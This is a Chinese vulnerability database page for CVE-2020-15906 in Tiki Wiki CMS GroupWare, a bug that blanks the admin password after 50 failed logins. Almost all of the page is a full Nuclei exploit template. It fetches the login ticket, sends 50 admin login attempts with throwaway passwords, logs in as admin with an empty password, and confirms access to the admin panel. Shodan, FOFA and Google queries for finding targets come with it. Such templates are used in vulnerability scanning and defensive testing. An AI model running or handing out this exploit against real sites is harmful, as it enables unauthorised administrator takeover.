CVE-2020-15906: Tiki Wiki CMS GroupWare - Authentication Bypass

日期: 2025-08-01 | 影响软件: Tiki Wiki CMS GroupWare | POC: 已公开

漏洞描述

tiki-login.php in Tiki before 21.2 sets the admin password to a blank value after 50 invalid login attempts.

PoC代码[已公开]

id: CVE-2020-15906

info:
  name: Tiki Wiki CMS GroupWare - Authentication Bypass
  author: JeonSungHyun[nukunga],gy741,oIfloraIo,nechyo,harksu
  severity: critical
  description: |
    tiki-login.php in Tiki before 21.2 sets the admin password to a blank value after 50 invalid login attempts.
  reference:
    - https://packetstormsecurity.com/files/159663/Tiki-Wiki-CMS-Groupware-21.1-Authentication-Bypass.html
    - https://nvd.nist.gov/vuln/detail/CVE-2020-15906
    - https://github.com/Z0fhack/Goby_POC
    - https://github.com/bakery312/Vulhub-Reproduce
    - https://github.com/20142995/Goby
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-15906
    cwe-id: CWE-307
    epss-score: 0.91138
    epss-percentile: 0.99632
    cpe: cpe:2.3:a:tiki:tiki:*:*:*:*:*:*:*:*
  metadata:
    vendor: tiki
    product: tiki
    shodan-query: title:"Tiki Wiki CMS"
    fofa-query: title="Tiki Wiki CMS"
    google-query: intitle:"Tiki Wiki CMS
  tags: packetstorm,cve,cve2020,tiki,wiki,auth-bypass

http:
  - raw:
      - |
        GET /tiki-login_scr.php HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        part: body
        name: ticket1
        internal: true
        group: 1
        regex:
          - 'class="ticket" name="ticket" value="(.*)"'

  - raw:
      - |
        POST /tiki-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Referer: {{RootURL}}/tiki-login_scr.php

        ticket={{ticket1}}&user=admin&pass={{attempt}}&login=&stay_in_ssl_mode_present=y&stay_in_ssl_mode=n

    payloads:
      attempt:
        - nkQ0yYzgF5Er
        - P5UdGflH48W3
        - xFq7vKNLmhZp
        - 8zKtGnh4dW5R
        - CfXp2VbQz8Er
        - Lh3K6vPzM9Xn
        - bG4RxHpY2MdQ
        - 7zNtKh3WqF5L
        - Y8rQ2GpLx9Kn
        - C7KzLmP5X9Vh
        - v3LdX8GmQ5Kn
        - W4NzX6PqL3Ft
        - Q5GhY2VrX7Jk
        - r9KdL4PhY6Gm
        - 8XjVq5LhZ2Kr
        - L5WnQ9KzY8Pr
        - M2XdL5GrY9Kh
        - N6YzP8WkL5Xt
        - G7JqX5VbM2Kp
        - H4PrX8LkY6Gm
        - J5LhY2VqX9Kr
        - 8GrX5NqL2KhY
        - K4WnY9PzM8Xt
        - Q2XkL5PrY8Vh
        - 9JhL4VqX5GrM
        - N2XdY5PqL9Kh
        - W4LhY8KzM5Xt
        - G5JqX2VrY9Kp
        - H9PrL5XkY2Gm
        - L8WnX5KzY9Pr
        - M4XkY2LqV5Gt
        - N5XdL9PqY8Kr
        - P8XnL5VrY2Kh
        - Q4JqX9LhY5Gr
        - V7LkX5PrY2Gt
        - L2WnY9KzX8Pr
        - M9XdL5PqY4Kh
        - N8LhY2VqX5Gr
        - Q7XkL5PrY9Gm
        - X4LhY8WnM5Kp
        - G2JqL5VrY9Kt
        - H7PrX8KzY2Gm
        - J4LhY5VqX9Kr
        - N9XkY2LqP5Gt
        - W8LhY5PrX2Kz
        - G4JqL5XkY9Vr
        - P5WnY2KzL8Gt
        - M7XkY9LhP2Gr
        - Q2JqL5VrY8Kh
        - 2JqL5VrY8Kh
    attack: batteringram
    threads: 50

  - raw:
      - |
        GET /tiki-login_scr.php HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /tiki-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Referer: {{RootURL}}/tiki-login.php

        ticket={{ticket2}}&user=admin&pass=&login=&stay_in_ssl_mode_present=y&stay_in_ssl_mode=n

    extractors:
      - type: regex
        part: body_1
        name: ticket2
        internal: true
        group: 1
        regex:
          - 'class="ticket" name="ticket" value="(.*)"'

  - raw:
      - |
        GET /tiki-index.php HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: or
    matchers:
      - type: word
        part: body
        words:
          - "System Menu"
          - "Home"
          - "Search"
          - "Wiki"
          - "File Galleries"
          - "Settings"
        condition: and

      - type: word
        words:
          - "Show on admin log-in"
          - "Tiki Setup"
        condition: and
# digest: 4b0a00483046022100b24c3d5f8121cab1fb17b6c7b0301c144a888d0504979c5b84dbae6b0932a2c8022100b2335bb9c6f2c4c7bbca825fea0fda1b8169fd95d8246b192b9dfa27a508f78c:922c64590222798bb761d5b6d8e72950

相关漏洞推荐